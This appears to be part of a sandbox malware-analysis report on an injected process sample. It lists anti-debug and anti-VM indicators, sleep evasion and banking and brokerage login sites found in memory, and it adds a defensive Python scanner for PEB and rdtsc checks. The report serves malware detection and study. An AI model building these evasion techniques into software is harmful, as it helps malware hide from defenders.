            Source: opp46lGmxd.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00ADC304 LoadLibraryA,GetProcAddress, 0_2_00ADC304
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00A88B85 push ecx; ret 0_2_00A88B98
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_004017E5 push ebp; retf 003Fh 2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx 2_2_03B309B6
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_0399225F pushad ; ret 4_2_039927F9
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_039927FA pushad ; ret 4_2_039927F9
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_039C09AD push ecx; mov dword ptr [esp], ecx 4_2_039C09B6
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_0399283D push eax; iretd 4_2_03992858
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_03991200 push eax; iretd 4_2_03991369
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032A2238 pushad ; iretd 4_2_032A2239
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032AAB37 push 00000038h; iretd 4_2_032AAB3B
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032A6E56 push ebx; iretd 4_2_032A6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032A0EAB push ebp; retf 4_2_032A0EAC
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032A6CB3 push ebx; iretd 4_2_032A6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_03291126 push esp; ret 4_2_03291127
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032AD1B0 push es; ret 4_2_032AD1D0
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032A101F push es; iretd 4_2_032A1027
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032A550F pushad ; retf 4_2_032A5510
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_0329FFA0 push esi; iretd 4_2_0329FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_032AFEF5 push FFFFFFBAh; ret 4_2_032AFEF7
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_038803DA push ebx; ret 4_2_0388042C
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_0388429A push cs; retf 4_2_038842F6
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_03884268 push cs; retf 4_2_038842F6
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_038847F5 push es; ret 4_2_038847FA
            Source: C:\Windows\SysWOW64\netbtugc.exe - Code function: 4_2_0388D620 push esi; ret 4_2_0388D63B
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00A64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00A64A35
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00AE55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00AE55FD
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A833C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A833C7
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\netbtugc.exe - Window / User API: threadDelayed 2454
            Source: C:\Windows\SysWOW64\netbtugc.exe - Window / User API: threadDelayed 7518
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-100488
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - API coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exe - API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe - API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868 - Thread sleep count: 2454 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868 - Thread sleep time: -4908000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868 - Thread sleep count: 7518 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868 - Thread sleep time: -15036000s >= -30000s
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920 - Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920 - Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920 - Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920 - Thread sleep count: 48 > 30
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe TID: 7920 - Thread sleep time: -48000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe - Last function: Thread delayed
            Source: C:\Users\user\Desktop\opp46lGmxd.exeAPI/Special instruction interceptor: Address: 3D83264
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AC4696
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00ACC9C7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACC93C FindFirstFileW,FindClose,0_2_00ACC93C
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ACF200
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ACF35D
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ACF65E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AC3A2B
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AC3D4E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ACBF27
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032ABAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_032ABAB0
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A64AFE
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696503903
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3853480914.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: firefox.exe, 00000008.00000002.1845031389.0000015A6EB6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696503903f
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: C:\Users\user\Desktop\opp46lGmxd.exeAPI call chain: ExitProcess graph end nodegraph_0-98970
            Source: C:\Users\user\Desktop\opp46lGmxd.exeAPI call chain: ExitProcess graph end nodegraph_0-99069
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417823 LdrLoadDll
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AD41FD BlockInput
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A63B4C GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A95CCC EncodePointer, EncodePointer, ___crtIsPackagedApp, LoadLibraryExW, GetLastError, LoadLibraryExW, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, IsDebuggerPresent, OutputDebugStringW, DecodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00ADC304 LoadLibraryA, GetProcAddress
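The rdtsc, DebugPort, IsDebuggerPresent and fs:[00000030h] hits in this report are all static evidence for one family of checks: rdtsc measures elapsed cycles to spot single-stepping, the DebugPort query and IsDebuggerPresent ask the OS, and a 32-bit load from fs:[30h] fetches the PEB pointer out of the TEB so the code can read PEB.BeingDebugged (offset 2) or PEB.NtGlobalFlag (offset 0x68) with no API call at all. The scanner below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it finds those byte patterns in a dumped 32-bit code region and labels which PEB field is read right after the pointer load, which is essentially how such "Code function" lines are produced. The SAMPLE bytes are constructed for the demonstration, and scan, Hit and report_lines are the example's own names.

```python
"""Static scanner for the 32-bit anti-debug byte patterns behind the
report's 'Code function' hits (PEB pointer loads from fs:[30h], rdtsc).
Added example: not part of the Joe Sandbox report or the sample; the
SAMPLE bytes are constructed, and scan/Hit/report_lines are this
example's own names."""
import re
from dataclasses import dataclass

# "mov r32, dword ptr fs:[30h]": 64 = fs override; A1 is the eax-only moffs32 form,
# 8B /r with ModRM mod=00 rm=101 (disp32, no base register) is the general form.
_MODRM_REG = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
              0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}
PEB_READ = re.compile(rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")
RDTSC = re.compile(rb"\x0F\x31")

# rm field of the register that now holds the PEB pointer (esp needs a SIB byte; skipped)
_RM = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "ebp": 5, "esi": 6, "edi": 7}


@dataclass
class Hit:
    offset: int
    kind: str          # "peb_read" or "rdtsc"
    reg: str = ""      # register loaded with the PEB pointer
    field: str = ""    # PEB field read by the next instruction, if recognised


def _peb_field(code: bytes, pos: int, reg: str) -> str:
    """Name the PEB field if the instruction at pos reads [reg+disp8] at a known offset."""
    rm = _RM.get(reg)
    if rm is None:
        return ""
    modrm = bytes([0x40 | rm])                          # mod=01 (disp8), reg=eax, rm=<reg>
    candidates = {
        b"\x0F\xB6" + modrm + b"\x02": "BeingDebugged",  # movzx eax, byte ptr [reg+2]
        b"\x8B" + modrm + b"\x0C": "Ldr",                 # mov eax, [reg+0Ch]
        b"\x8B" + modrm + b"\x18": "ProcessHeap",         # mov eax, [reg+18h]
        b"\x8B" + modrm + b"\x68": "NtGlobalFlag",        # mov eax, [reg+68h]
    }
    for pattern, name in candidates.items():
        if code.startswith(pattern, pos):
            return name
    return ""


def scan(code: bytes, base: int = 0) -> list:
    """Return every PEB-pointer load and rdtsc in code, offsets rebased to base."""
    hits = []
    for m in PEB_READ.finditer(code):
        enc = m.group(0)
        reg = "eax" if enc[1] == 0xA1 else _MODRM_REG[enc[2]]
        hits.append(Hit(base + m.start(), "peb_read", reg, _peb_field(code, m.end(), reg)))
    hits += [Hit(base + m.start(), "rdtsc") for m in RDTSC.finditer(code)]
    return sorted(hits, key=lambda h: h.offset)


def report_lines(hits, source: str) -> list:
    """Render hits in the report's own 'Source ... Code function' shape."""
    out = []
    for h in hits:
        insn = "rdtsc" if h.kind == "rdtsc" else f"mov {h.reg}, dword ptr fs:[00000030h]"
        suffix = f" -> PEB.{h.field}" if h.field else ""
        out.append(f"Source: {source} | Code function: {h.offset:08X} {insn}{suffix}")
    return out


# Constructed sample: a BeingDebugged check, an NtGlobalFlag check via ecx and a
# two-rdtsc timing stub (these are not bytes taken from the analysed sample).
SAMPLE = (
    b"\x55\x8B\xEC"                      # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"          # mov eax, fs:[30h]
    b"\x0F\xB6\x40\x02"                  # movzx eax, byte ptr [eax+2]  (BeingDebugged)
    b"\x85\xC0\x75\x10"                  # test eax, eax; jnz short
    b"\x64\x8B\x0D\x30\x00\x00\x00"      # mov ecx, fs:[30h]
    b"\x8B\x41\x68"                      # mov eax, [ecx+68h]           (NtGlobalFlag)
    b"\xA9\x70\x00\x00\x00"              # test eax, 70h  (heap flags a debugger sets)
    b"\x0F\x31"                          # rdtsc
    b"\x8B\xF0"                          # mov esi, eax
    b"\x0F\x31"                          # rdtsc
    b"\x2B\xC6"                          # sub eax, esi   (elapsed cycles)
    b"\xC3"                              # ret
)

if __name__ == "__main__":
    # 0x03B70900 is a hypothetical load address for the dumped region
    for line in report_lines(scan(SAMPLE, base=0x03B70900), r"C:\Windows\SysWOW64\svchost.exe"):
        print(line)
```

Run it over a dumped 32-bit region with base set to the region's load address and the offsets it prints line up with the function addresses the report uses. Caveats a practitioner should keep in mind: the patterns are 32-bit only (x64 code reads the PEB through gs:[60h]), raw byte matching has no instruction-boundary awareness, so the displacement 30 00 00 00 can match inside data, and when the instruction after the load is not one of the four recognised field reads (the pointer being spilled to a stack slot, for instance) the hit is still reported, just with an empty field.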
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_03D83530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_03D834D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_03D81ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax/ecx, dword ptr fs:[00000030h] (6 occurrences: 5 eax, 1 ecx)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax/ecx, dword ptr fs:[00000030h] (6 occurrences: 5 eax, 1 ecx)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB8243 mov eax/ecx, dword ptr fs:[00000030h] (2 occurrences: 1 eax, 1 ecx)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax/ecx, dword ptr fs:[00000030h] (5 occurrences: 4 eax, 1 ecx)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov ecx/eax, dword ptr fs:[00000030h] (4 occurrences: 1 ecx, 3 eax)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax/ecx, dword ptr fs:[00000030h] (5 occurrences: 4 eax, 1 ecx)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF60B8 mov eax/ecx, dword ptr fs:[00000030h] (2 occurrences: 1 eax, 1 ecx)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]
